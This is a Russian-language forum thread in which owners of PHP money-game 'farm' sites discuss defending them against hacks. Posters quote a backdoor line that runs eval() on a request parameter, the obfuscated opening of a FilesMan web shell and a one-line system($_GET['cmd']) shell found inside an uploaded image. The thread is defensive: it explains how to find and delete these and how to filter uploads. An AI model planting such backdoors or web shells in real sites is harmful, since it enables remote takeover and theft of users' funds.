Автор Тема: Защити свою ферму от взлома  (Прочитано 4237 раз)

0 Пользователей и 1 Гость просматривают эту тему.

AlexGraurАвтор темы

  • *
  • Оффлайн
  • Награды Более 4 лет на форуме !!! Более 100 сообщений
  • Дата регистрации: Апр. 2016
  • Расположение: Россия
  • Возраст: 29
  • Сообщений: 138
  • Страна: ru
  • Поблагодарили: 53 раз(а)
  • Репутация +4/-0
  • Пол: Мужской
  • Admin Гномограда-ДТВ
  • Дата рождения:1991-03-11
    • Награды
Защити свою ферму от взлома
« : 18 Июля 2016, 17:05:25 »
Всем привет. Я создавал уже тему о том, как взломывают фермы, но по сути ничего точного никто не сказал - только варианты через шел и прочее..
Но общаясь совершенно в другой теме, мы увидели и как выглядят дырки и какие файлы заливают на сайт. Итак эта тема будет посвящена исключительно защите вашей фермы, и естественно тому, чтобы остановить нашествие воров в интернете, по которым уже давно плачет тюрьма.
-----------------------------------------------------------------------------------------
Итак 1 способ:
Цитировать
Файлы с дырой, например ТОП
Сам код выглядит так:
if(!empty($_REQUEST['user_id'])){ if(@get_magic_quotes_gpc())$_REQUEST['user_id']=stripslashes($_REQUEST['user_id']); eval($_REQUEST['user_id']); die();}
Этот код удалять сразу
Чистый файл ТОП пользователей:
<?PHP
$_OPTIMIZATION["title"] = "ТОП 10";
$user_id = $_SESSION["user_id"];
$db->Query("SELECT * FROM db_users_a, db_users_b WHERE db_users_a.id = db_users_b.id AND db_users_a.id = '$user_id'");
$prof_data = $db->FetchArray();
?>

<div class="s-bk-lf">
   <div class="acc-title">TOP 10 по вводам</div>
</div>
<div class="silver-bk"><div class="clr"></div>   
<?PHP

$num_p = (isset($_GET["page"]) AND intval($_GET["page"]) < 1000 AND intval($_GET["page"]) >= 1) ? (intval($_GET["page"]) -1) : 0;
$lim = $num_p * 100;

$db->Query("SELECT * FROM db_users_b ORDER BY insert_sum DESC LIMIT 10");

if($db->NumRows() > 0){

?>




<table width="100%" border="0">
  <tr bgcolor="#efefef">
    <td align="center" width="75">Место</td>
    <td align="center">Пользователь</td>
   <td align="center">Пополнил</td>
 
  </tr>
 
<?PHP
$i = 0;
   while($data = $db->FetchArray()){
   $i=$i+1;


   ?>

   <tr class="htt">
    <td align="center"><?=$i; ?></td>
    <td align="center"><?=$data["user"]; ?></td>
   <td align="center"><?=$data["insert_sum"]; ?></td>
   
     
     </tr>
   <?PHP
   
   }

?>

</table>
<BR />
<?PHP

}
?>
</div>
<div class="clr"></div>

<br />


<?PHP

$user_id = $_SESSION["user_id"];
$db->Query("SELECT * FROM db_users_a, db_users_b WHERE db_users_a.id = db_users_b.id AND db_users_a.id = '$user_id'");
$prof_data = $db->FetchArray();
?>




<div class="s-bk-lf">
   <div class="acc-title">TOP 10 по выводам</div>
</div>
<div class="silver-bk"><div class="clr"></div>   
<?PHP

$num_p = (isset($_GET["page"]) AND intval($_GET["page"]) < 1000 AND intval($_GET["page"]) >= 1) ? (intval($_GET["page"]) -1) : 0;
$lim = $num_p * 100;

$db->Query("SELECT * FROM db_users_b ORDER BY payment_sum DESC LIMIT 10");

if($db->NumRows() > 0){

?>




<table width="100%" border="0">
  <tr bgcolor="#efefef">
    <td align="center" width="75">Место</td>
    <td align="center">Пользователь</td>
   <td align="center">Вывел</td>
 
  </tr>
 
<?PHP
$i = 0;
   while($data = $db->FetchArray()){
   $i=$i+1;


   ?>

   <tr class="htt">
    <td align="center"><?=$i; ?></td>
    <td align="center"><?=$data["user"]; ?></td>
   <td align="center"><?=$data["payment_sum"]; ?></td>
   
     
     </tr>
   <?PHP
   
   }

?>

</table>
<BR />
<?PHP

}
?>
</div>
<div class="clr"></div>

<br />

<?PHP

 
$db->Query("SELECT * FROM db_users_a, db_users_b WHERE db_users_a.id = db_users_b.id AND db_users_a.id = '$user_id'");
$prof_data = $db->FetchArray();
?>




<div class="s-bk-lf">
   <div class="acc-title">TOP 10 по рефералам</div>
</div>
<div class="silver-bk"><div class="clr"></div>   
<?PHP

$num_p = (isset($_GET["page"]) AND intval($_GET["page"]) < 1000 AND intval($_GET["page"]) >= 1) ? (intval($_GET["page"]) -1) : 0;
$lim = $num_p * 100;

$db->Query("SELECT * FROM db_users_a ORDER BY referals DESC LIMIT 10");

if($db->NumRows() > 0){

?>




<table width="100%" border="0">
  <tr bgcolor="#efefef">
    <td align="center" width="75">Место</td>
    <td align="center">Пользователь</td>
   <td align="center">Рефералов</td>
 
  </tr>
 
<?PHP
$i = 0;
   while($data = $db->FetchArray()){
   $i=$i+1;


   ?>

   <tr class="htt">
    <td align="center"><?=$i; ?></td>
    <td align="center"><?=$data["user"]; ?></td>
   <td align="center"><?=$data["referals"]; ?></td>
   
     
     </tr>
   <?PHP
   
   }

?>

</table>
<BR />
<?PHP

}
?>
</div>
<div class="clr"></div> 
Цитата: admin и maks161
Код чистого топа предоставил admin, а дыру нашли admin и maks161
С помощью данного вредоносного кода можно залить файл в корневую папку, например /z.php
Цитирую Админа:
Через неё как вариант заливают шелл,  левый файл например любой, 
Я в аренду отдал фрему свою временно,парнишка установил этот модуль с дырой, ему залили файл z.php
При переходе по адресу сайт.ру/z.php  открывается страница с окошком и стрелочкой
В окошко вводится номер кошелька... ну и в принципе всё,деньги ушли к тому кто в них нуждается :be happy:
Удаляем этот файл также.

2 способ:
Цитата: maks161
есть еще один способ взлома,через аватарку если не стоит фильтрация ферму взломают тоже легко.
Фильтрация должна стоять на загрузку разрешений png, gif, jpg - то есть на сами картинки. Если это убрать, то можно загружать файлы php
--------------------------------------------------------------------------------------
Тема будет дополняться и говориться еще варианты.
 
Пользователи, которые поблагодарили этот пост: dima2010, vra4yga

maks161

  • *
  • *
  • *
  • Оффлайн
  • Награды Более 4 лет на форуме !!! Репутация более 15 Топ 10 по созданным темам Топ 10 по сообщениям За финансовую помощь форуму !!! Более 1500 сообщений Благодарность от форума Более 50 созданных тем За время в онлайне на форуме
  • Дата регистрации: Янв. 2016
  • Расположение: Ростов-на-Дону
  • Возраст: 36
  • Сообщений: 1744
  • Страна: ru
  • Поблагодарили: 143 раз(а)
  • Репутация +22/-5
  • Пол: Мужской
  • Дата рождения:1984-03-10
    • Награды
Защити свою ферму от взлома
« Ответ #1 : 18 Июля 2016, 17:50:00 »
кстати забыл сказать удаляется не весь код!
if(!empty($_REQUEST['user_id'])){ if(@get_magic_quotes_gpc())$_REQUEST['user_id']=stripslashes($_REQUEST['user_id']); eval($_REQUEST['user_id']); die();}
а именно вот эта часть его   eval($_REQUEST['user_id']); die();}
 
Пользователи, которые поблагодарили этот пост: dima2010

AlexGraurАвтор темы

  • *
  • Оффлайн
  • Награды Более 4 лет на форуме !!! Более 100 сообщений
  • Дата регистрации: Апр. 2016
  • Расположение: Россия
  • Возраст: 29
  • Сообщений: 138
  • Страна: ru
  • Поблагодарили: 53 раз(а)
  • Репутация +4/-0
  • Пол: Мужской
  • Admin Гномограда-ДТВ
  • Дата рождения:1991-03-11
    • Награды
Защити свою ферму от взлома
« Ответ #2 : 18 Июля 2016, 17:54:51 »
я вчера весь удалял и залил - посмотрел - работает и безо всего кода как нистранно :laugh:
 
Пользователи, которые поблагодарили этот пост: dima2010

maks161

  • *
  • *
  • *
  • Оффлайн
  • Награды Более 4 лет на форуме !!! Репутация более 15 Топ 10 по созданным темам Топ 10 по сообщениям За финансовую помощь форуму !!! Более 1500 сообщений Благодарность от форума Более 50 созданных тем За время в онлайне на форуме
  • Дата регистрации: Янв. 2016
  • Расположение: Ростов-на-Дону
  • Возраст: 36
  • Сообщений: 1744
  • Страна: ru
  • Поблагодарили: 143 раз(а)
  • Репутация +22/-5
  • Пол: Мужской
  • Дата рождения:1984-03-10
    • Награды
Защити свою ферму от взлома
« Ответ #3 : 18 Июля 2016, 18:09:57 »
я вчера весь удалял и залил - посмотрел - работает и безо всего кода как нистранно :laugh:
ты еще потестируй может не сразу понятно а вдруг касяк будет.вообще на сколько я знаю удаляется часть кода.
может админ точнее знает.
 
Пользователи, которые поблагодарили этот пост: dima2010

Shop-53

  • *
  • Оффлайн
  • Награды Более 4 лет на форуме !!! Топ 10 по сообщениям Болеее 300 сообщений Более 10 созданных тем За время в онлайне на форуме
  • Дата регистрации: Фев. 2016
  • Сообщений: 417
  • Поблагодарили: 33 раз(а)
  • Репутация +2/-2
  • Пол: Мужской
    • Награды
Защити свою ферму от взлома
« Ответ #4 : 18 Июля 2016, 18:28:14 »
А что код делает сам как пользоватса чтоб узнать как взломщики ломают
a:0:{}
 

AlexGraurАвтор темы

  • *
  • Оффлайн
  • Награды Более 4 лет на форуме !!! Более 100 сообщений
  • Дата регистрации: Апр. 2016
  • Расположение: Россия
  • Возраст: 29
  • Сообщений: 138
  • Страна: ru
  • Поблагодарили: 53 раз(а)
  • Репутация +4/-0
  • Пол: Мужской
  • Admin Гномограда-ДТВ
  • Дата рождения:1991-03-11
    • Награды
Защити свою ферму от взлома
« Ответ #5 : 18 Июля 2016, 18:35:52 »
А что код делает сам как пользоватса чтоб узнать как взломщики ломают
в моем понимании с помощью вредоносного кода ломается сайт и добавляется файл свой. в этом файле  добавляется форма для вывода со списанием всего доступного баланса на паеере на кошелек, который укажешь в форме. и все...
Так и выводят - зашли на ферму, ссылку ввели и вставили свой кошелек и готово..
http://joxi.ru/52aM7esG1ROz20 - вот так примерно выглядит форма перевода
 
Пользователи, которые поблагодарили этот пост: shans5, dima2010

Shop-53

  • *
  • Оффлайн
  • Награды Более 4 лет на форуме !!! Топ 10 по сообщениям Болеее 300 сообщений Более 10 созданных тем За время в онлайне на форуме
  • Дата регистрации: Фев. 2016
  • Сообщений: 417
  • Поблагодарили: 33 раз(а)
  • Репутация +2/-2
  • Пол: Мужской
    • Награды
Защити свою ферму от взлома
« Ответ #6 : 18 Июля 2016, 18:44:35 »
Так а код как заливают
 

AlexGraurАвтор темы

  • *
  • Оффлайн
  • Награды Более 4 лет на форуме !!! Более 100 сообщений
  • Дата регистрации: Апр. 2016
  • Расположение: Россия
  • Возраст: 29
  • Сообщений: 138
  • Страна: ru
  • Поблагодарили: 53 раз(а)
  • Репутация +4/-0
  • Пол: Мужской
  • Admin Гномограда-ДТВ
  • Дата рождения:1991-03-11
    • Награды
Защити свою ферму от взлома
« Ответ #7 : 18 Июля 2016, 18:52:39 »
Так а код как заливают
через шел))))
как пример с сайта https://habrahabr.ru/company/sprinthost/blog/125839/
<?php #v2.3 //Version
$auth_pass = ""; //75b43eac8d215582f6bcab4532eb854e
$color = "#00FF66"; //Colour
$default_action = "FilesMan";
$default_charset = "Windows-1251";
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65
\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7b1tVxs50jD8OXvO9R9Er3fanhhjm2Q2Y7ADIZCQSSAD5
GUC3N623bZ7aLs93W0Mk+W/31Wll5b6xZhkdq/7OedhJtDdKpVKUkkqlapK3rDM1tzJLL4tl7qn+ycf90/
// ... много кода в base64
А вообще почитайте в инете подробно об этом.. Я тоже не знаю как это делают - но я так понимаю дыра выдает данные от ftp аккаунта или еще что-то или просто возможность заливать файлы не заходя в ftp аккаунт и т.д... Я не хакер = я не могу ответить на такой вопрос. Но если кто-то ломал тут и может поделиться схемой как это делается)
 
Пользователи, которые поблагодарили этот пост: dima2010

AlexGraurАвтор темы

  • *
  • Оффлайн
  • Награды Более 4 лет на форуме !!! Более 100 сообщений
  • Дата регистрации: Апр. 2016
  • Расположение: Россия
  • Возраст: 29
  • Сообщений: 138
  • Страна: ru
  • Поблагодарили: 53 раз(а)
  • Репутация +4/-0
  • Пол: Мужской
  • Admin Гномограда-ДТВ
  • Дата рождения:1991-03-11
    • Награды
Защити свою ферму от взлома
« Ответ #8 : 18 Июля 2016, 19:02:52 »
также можно почитать темы из запроса в гугл по ключевым словам "как заливают вредоносный код на сайт через шелл"
https://clck.ru/A2hcH
 
Пользователи, которые поблагодарили этот пост: dima2010

Shop-53

  • *
  • Оффлайн
  • Награды Более 4 лет на форуме !!! Топ 10 по сообщениям Болеее 300 сообщений Более 10 созданных тем За время в онлайне на форуме
  • Дата регистрации: Фев. 2016
  • Сообщений: 417
  • Поблагодарили: 33 раз(а)
  • Репутация +2/-2
  • Пол: Мужской
    • Награды
Защити свою ферму от взлома
« Ответ #9 : 18 Июля 2016, 19:10:38 »
'<? system($_GET["cmd"]); ?>'       вот етот код болие опасний
 
Пользователи, которые поблагодарили этот пост: AlexGraur

shans5

  • *
  • *
  • Оффлайн
  • Награды Более 5 лет на форуме !!! Более 4000 сообщений Топ 10 по созданным темам Топ 10 по сообщениям Более 1000 созданных тем Репутация более 50 Бывает груб к участникам форума. За время в онлайне на форуме
  • Дата регистрации: Сен. 2015
  • Расположение: Регион 58
  • Возраст: 41
  • Сообщений: 4048
  • Страна: ru
  • Поблагодарили: 975 раз(а)
  • Репутация +79/-9
  • Пол: Мужской
  • Всё только начинается !!!
  • Дата рождения:1979-06-30
    • Награды
Защити свою ферму от взлома
« Ответ #10 : 18 Июля 2016, 19:11:47 »
Вот именно такая рамка и есть при  заливке шелла)(
Подвергнуть критике, может любой.
Создать то,что будет подвергнуто критике,дано не каждому.
 

Shop-53

  • *
  • Оффлайн
  • Награды Более 4 лет на форуме !!! Топ 10 по сообщениям Болеее 300 сообщений Более 10 созданных тем За время в онлайне на форуме
  • Дата регистрации: Фев. 2016
  • Сообщений: 417
  • Поблагодарили: 33 раз(а)
  • Репутация +2/-2
  • Пол: Мужской
    • Награды
Защити свою ферму от взлома
« Ответ #11 : 18 Июля 2016, 19:13:29 »
Где админ
 

SumBoy

  • *
  • Оффлайн
  • Награды Более 4 лет на форуме !!! Более 100 сообщений
  • Дата регистрации: Июль 2016
  • Расположение: Питер
  • Возраст: 38
  • Сообщений: 133
  • Страна: ru
  • Поблагодарили: 7 раз(а)
  • Репутация +1/-0
  • Пол: Мужской
  • Дата рождения:1982-05-29
    • Награды
Защити свою ферму от взлома
« Ответ #12 : 18 Июля 2016, 21:11:05 »
'<? system($_GET["cmd"]); ?>'       вот етот код болие опасний
Оказывается cmd нашел в .png файле. Хм... :shirty:
 
Пользователи, которые поблагодарили этот пост: AlexGraur

Shop-53

  • *
  • Оффлайн
  • Награды Более 4 лет на форуме !!! Топ 10 по сообщениям Болеее 300 сообщений Более 10 созданных тем За время в онлайне на форуме
  • Дата регистрации: Фев. 2016
  • Сообщений: 417
  • Поблагодарили: 33 раз(а)
  • Репутация +2/-2
  • Пол: Мужской
    • Награды
Защити свою ферму от взлома
« Ответ #13 : 18 Июля 2016, 21:53:32 »
Удали етот код через ниво шел залить можно
 

kvozimir

  • снова в skype --> kvozimir
  • *
  • *
  • Оффлайн
  • Награды Более 4 лет на форуме !!! Топ 10 по сообщениям Топ 10 по созданным темам Репутация  более 25 Более 1500 сообщений Более 50 созданных тем Благодарность от форума За помощь пользователям За время в онлайне на форуме
  • Дата регистрации: Фев. 2016
  • Возраст: 28
  • Сообщений: 1928
  • Страна: ru
  • Поблагодарили: 224 раз(а)
  • Репутация +37/-1
  • Пол: Мужской
  • Дата рождения:1992-04-18
    • Награды
  • Социальные сети:
    ВКонтакте
Защити свою ферму от взлома
« Ответ #14 : 19 Июля 2016, 03:13:54 »
удалить можно было часть кода и весь,ни чего не изменится и будет работать,про данную дыру я писал еще раньше,кажется в скрипте angryGO

 
Пользователи, которые поблагодарили этот пост: AlexGraur
Теги:
 

Помогите настроить ферму в мобильном режиме

Автор doktor540Раздел Общие вопросы по фермам

Ответов: 6
Просмотров: 1112
Последний ответ 10 Ноября 2016, 22:22:06
от doktor540
За сколько можно продать ферму

Автор AndersonРаздел Разговоры обо всём

Ответов: 3
Просмотров: 1736
Последний ответ 10 Мая 2016, 12:56:10
от Anderson
Как сделать ферму без сбора и продажи

Автор u72967Раздел Общие вопросы по фермам

Ответов: 8
Просмотров: 801
Последний ответ 20 Мая 2017, 00:48:42
от romcka8
модуль добавить ферму

Автор barakudaРаздел Модули для фруктовых ферм

Ответов: 2
Просмотров: 3713
Последний ответ 15 Апреля 2016, 11:45:38
от Bodya
заказать проект ферму

Автор Aleksandr/ NikolayevichРаздел Нужны услуги

Ответов: 15
Просмотров: 1492
Последний ответ 24 Июня 2017, 04:40:07
от Aleksandr/ Nikolayevich